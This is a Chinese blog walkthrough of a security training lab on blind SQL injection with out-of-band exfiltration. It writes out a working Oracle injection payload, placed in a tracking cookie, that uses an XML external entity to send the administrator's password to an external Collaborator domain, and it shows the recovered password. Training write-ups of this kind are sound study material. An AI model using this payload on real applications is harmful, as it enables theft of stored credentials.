当前位置: 首页 > article >正文

Lab17_ Blind SQL injection with out-of-band data exfiltration

文章目录

  • 前言:
  • 进入实验室
  • 构造 payload

前言:

实验室标题为:

带外数据泄露的 SQL 盲注

简介:

本实验包含一个SQL盲目注入漏洞。应用程序使用跟踪Cookie进行分析,并执行包含提交的Cookie值的SQL查询。

SQL查询是异步执行的,对应用程序的响应没有影响。但是,您可以触发与外部域的带外交互。

该数据库包含一个名为users的表,其中的列名为username和password。您需要利用SQL盲目注入漏洞来找出管理员用户的密码。

要解决实验,请以管理员用户身份登录。

注意

为了防止Academy平台被用于攻击第三方,我们的防火墙阻止了实验室与任意外部系统之间的交互。要解决实验,您必须使用Burp Collaborator的默认公共服务器。

提示

您可以在 SQL 注入小抄中找到一些有用的有效载荷

进入实验室

依然是商店页面

构造 payload

点击任意分类,打开 burp 进行抓包

复制 Collaborator 中的链接

TrackingId=x' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.c5inwpad5ruzenww7a6z0gt3dujm7cv1.oastify.com/"> %remote;]>'),'/l') FROM dual--

发送数据包,成功响应

转到 Collaborator 模块,点击 Poll now

可以看到管理员账户的密码被成功外带出来

登录管理员账号

administrator

q1uuvho3ov5renjtp936

成功登录管理员账户


http://www.kler.cn/a/576839.html

相关文章:

  • MTK Android12 桌面上显示文件管理器图标
  • 深入剖析 ConcurrentHashMap:高并发场景下的高效哈希表
  • 查看k8s集群的资源使用情况
  • Azure云生态系统详解:核心服务、混合架构与云原生概念
  • 一文了解基于AUTOSAR的ECU传感器信号处理全流程
  • [PWNME 2025] PWN 复现
  • 数据结构(回顾)
  • 安装CUDA12.1和torch2.2.1下的DKG
  • 基于cross-attention算法关联文本和图像、图像和动作
  • Logstash同步MySQL到ES
  • 从0到1入门Linux
  • MongoDB(一) - MongoDB安装教程(Windows + Linux)
  • STM32使用无源蜂鸣器
  • 深度解读DeepSeek:从原理到模型(二)
  • 小程序 wxml 语法 —— 37 setData() - 修改对象类型数据
  • [视频编码]rkmpp 实现硬件编码
  • 群晖DS 223 Docker:开启私有云
  • PCI 总线学习笔记(四)
  • 【linux网络编程】套接字编程API详细介绍
  • 怎么用vscode 写 markdown 文档